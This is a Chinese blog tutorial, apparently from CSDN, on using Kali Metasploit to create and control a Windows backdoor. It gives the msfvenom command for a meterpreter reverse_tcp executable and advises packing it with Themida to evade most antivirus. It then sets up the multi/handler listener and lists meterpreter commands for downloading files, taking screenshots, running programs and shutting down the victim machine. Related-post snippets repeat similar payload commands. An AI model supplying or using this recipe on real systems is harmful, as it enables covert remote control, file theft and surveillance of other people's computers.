kali metasploit 制作后门程序远程操控基本使用方法

已于 2022-10-23 18:55:55 修改
阅读量4k 收藏 42
点赞数 2
分类专栏: Metasploit内网 文章标签: 安全 渗透测试
于 2021-12-03 10:22:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51685718/article/details/121692241
版权

kali metasploit制作后门程序远程操控基本使用方法

1.后门程序的制作与加密

后门的实质就是木马

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exe

lhost后面加的是本机ip,lport后面加的是想要打开的端口号

执行后会在本地生成一个biyu.exe的文件

如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。

下载Themida

在这里插入图片描述
直接文件拖进去,点击protect会生成一个protect

这会使他躲过大多数杀毒软件扫描

然后将他传到win的系统就可以开始远程操控了

2,kali操控win

在这里使用Xshell进行演示

打开终端

msfconsole

在这里插入图片描述

use exploit/multi/handler

在这里插入图片描述

set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.31.53
set lport 10000
run

ip与端口和文件创建时一致

在这里插入图片描述
此时已开始了监听模式

回到win运行exe

在这里插入图片描述
成功连接

此时就可以操纵win了

**

一些基本命令

**

1、基本命令(包含meterpreter和msf终端、ruby接口、目标shell交互的命令)

background(进程隐藏至后台)

sessions(查看已经成功获取的会话,-i 恢复会话)

quit(关闭当前会话)

shell (获取系统控制台shell,如果目标系统命令行可执行程序不存在或禁止访问, 则shell命令会出错)

irb(与Ruby终端交互,调用metasploit封装好的函数;在irb中还可以添加metasploit附加组件railgun,直接与windows本地API进行交互)

2、文件系统命令(与目标文件系统交互,包括查看、上传下载、搜索、编辑)

cat(目标系统文件交互)

getwd(获取目标机当前工作目录,getlwd本地当前工作工作目录)

upload(上传文件或文件夹到目标机 -r 递归)

download(从目标机下载文件或文件夹 -r 递归)

edit(调用vi编辑器,对目标上的文件进行编辑)

search(对目标机的文件进行搜索)

3、网络命令(查看目标网络状况、连接信息,进行端口转发等)

ipconfig(获取目标主机上的网络接口信息)

portfwd(端口转发:将目标主机开放但不允许访问的端口进行转发)

route(显示目标主机路由信息)

4、系统命令(查看目标系统信息、对系统进行基本操作等)

ps(查看目标机正在运行的进程信息)

migrate(将meterpreter会话进程迁移到另一个进程内存空间)

execute(在目标机上执行文件)

getpid(当前会话所在进程的pid值)

kill(终结指定的pid程序)

getuid(获取当前会话用户名)

sysinfo(获取系统信息)

shutdown(关闭目标主机)

5、用户接口命令

screenshot(截获被控主机当前桌面)

兰公子&
关注
  • 2
    点赞
  • 42
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
msfvenom制作简易后门程序
wing_7的博客
10-05 597
设置错误端口8888监听不到,修改端口 4444 ,kali显示 session 连接接成功获取shell成功。使用exploit/mulit/handler模块并进行设置。基于Linux的Shellcode。ubuntu中获取cve 执行。
12.3、后渗透测试--持久化后门
无痕的博客
12-13 2194
metasploit渗透测试--持久化后门
【Web安全kali渗透工具MSF以及msfconsole命令详解
最新发布
2301_77472496的博客
05-31 1059
记录一次体验kali渗透工具MSF以及msfconsole命令详解
Python黑客攻防(九)编写后门程序
qq_43681532的博客
07-16 4908
前言 本篇文章讲解如何编写后门程序,并实践测试运行,通过后门程序查找文件。 后门基本概念 防火墙用于拦截用户从外部访问服务器。访问服务器的Telnet、FTP等服务只限允许的用户使用。防火墙并不会阻断用户从内部向外部的访问路径。虽然很难从外部侵入防火墙,但一旦成功,黑客就能轻松窃取敏感信息。后门技术用于绕过防火墙等安全设备,掌控服务器资源。安装于目标服务器的后门客户端会接收并运行来自后门服务器的命令,并将运行结果发送给后门服务器。 利用后门发动攻击时,最困难的是向目标系统安装后门客户端。通过网络直接上传文件
简单后门程序
07-05 196
//door.cpp:Definestheentrypointfortheconsoleapplication. // #include"stdafx.h" #include<stdio.h> #include<winsock2.h> #p...
MSF给正常程序添加后门
永远是少年
06-10 1546
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
kali metasploit 远程控制Windows
天码行空的码的博客
07-08 2210
一、在kali中生成被控制端程序 root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.88.188 LPORT=5901 -f exe > test.exe #生成Windows端 msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.88.188 LPORT=5555 R
Python实现远程调用MetaSploit方法
12-23
本文较为详细的讲述了Python实现远程调用MetaSploit方法,对Python的学习来说有很好的参考价值。具体实现方法如下: (1)安装Python的msgpack类库,MSF官方文档中的数据序列化标准就是参照msgpack。 root@kali:...
kali-linux 工具Metasploit离线式攻击使用教程
12-29
本教程将聚焦于Metasploit的离线攻击使用方法,这对于那些在没有互联网连接或者需要保持匿名状态的环境中工作的安全专家尤其重要。 Metasploit框架是一个开源项目,它提供了大量的攻击模块,涵盖了网络扫描、漏洞...
Kali系列之root账户ssh远程登录配置.docx
12-06
在某些情况下,如果你使用的是旧版本的客户端工具(如CRT)尝试连接到新的Kali Linux,可能会遇到秘钥交换算法不兼容的问题。这是因为新版本Kali支持的加密算法与旧版本不完全一致。为解决这个问题,你需要编辑`sshd...
使用kali-linux将Metasploit Framework接入互联网的使用教程
12-29
使用kali-linux将Metasploit Framework接入互联网的使用教程
后门程序制作示例+源码
03-08
程序后门制作程序后门制作程序后门制作程序后门制作
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
metasploit下Windows的多种提权方法
02-25
当你在爱害者的机器上执行一些操作时,发现有一些操作被拒绝执行,为了获得受害机器的完全权限,你需要绕过限制,获取本来...上面这些模块的详细信息在metasploit里已有介绍,这里不再多说,主要说一下使用方法。以e
kali Linux生成Windows后门
webkm的博客
04-24 848
教程开始: Kali是一个强大系统,有很多的工具可以用来进行渗透。今天,介绍自己的初始的一个新手木马。 首先,查看一下工具msfvenom的功能参数吧。 msfvenom 查看功能模块 msfvenom -l payloads 然后,使用工具msfvenom来生成后门木马,这个是专业的创建木马后门的工具。命令如下: 生成了木马shell.exe,顺便一提lhost(localhost)和lport要设置为你的IP和你打算使用的端口。 ...
kali的学习笔记篇(七)metasploit之PC后门
Kind&红衣的博客
08-12 1139
//生成后门 //参数可参照第五篇文章:PC渗透参数集 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=192.168.1.113 LPORT=55555 -f exe &amp;amp;amp;gt; /root/muma.exe //选择模块 use exploit/multi/handler //装载攻击载...
利用msf生成后门拿shell
热门推荐
qq_36406396的博客
11-15 1万+
kali  x64:192.168.26.136 win7  x86: 192.168.26.128 先在kali终端输入msfvenom -l,打开payload目录 然后找到payload windows/meterpreter/reverse_tcp 输入以下命令生成后门qq.exe 然后将生成的qq.exe移到win7中,然后打开msf
程序后门制作
lovelan1748的专栏
03-08 947
两个项目,BackDoor是程序后门的核心代码,FormTest为测试类 上星期有人在C#论坛里发了程序后门的例程,但是制作方法封装在一个稍微有点麻烦的动态库里,今天把大致的制作方法提取出来重新写了个自己的,供大家参考,欢迎大家批评指正。 源码下载
Kali Linux远程连接Windows服务器
weixin_30361753的博客
11-30 3231
前言: 为了在Kali远程连接Windows系统的服务器我们需要安装两个工具,rdesktop和tsclient。另外,我们从主机服务商那里购买的Windows操作系统的服务器都是默认开启了远程连接的,如果我们要在局域网里连接桌面版的Windows系统一般还需要开启并配置好远程桌面。 操作步骤: 安装rdesktop,输入命令: apt-get install rdeskto...
怎么使用kali metasploit 控制被控制系统的音量大小?
05-11
Kali Linux中使用Metasploit控制被控制系统的音量大小是不可能的,因为Metasploit是一个漏洞利用框架,主要用于测试网络安全。它不能直接控制操作系统的音量大小。 如果您需要控制被控制系统的音量大小,您可以使用其他工具或编写自己的脚本来实现。例如,您可以使用命令行工具alsamixer来控制音量大小。您可以使用Python或其他语言编写脚本来自动化这个过程。 但是请注意,在未经授权的情况下远程控制他人计算机是非法的,这是一种严重的网络犯罪行为。所以请谨慎使用任何工具和技术。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值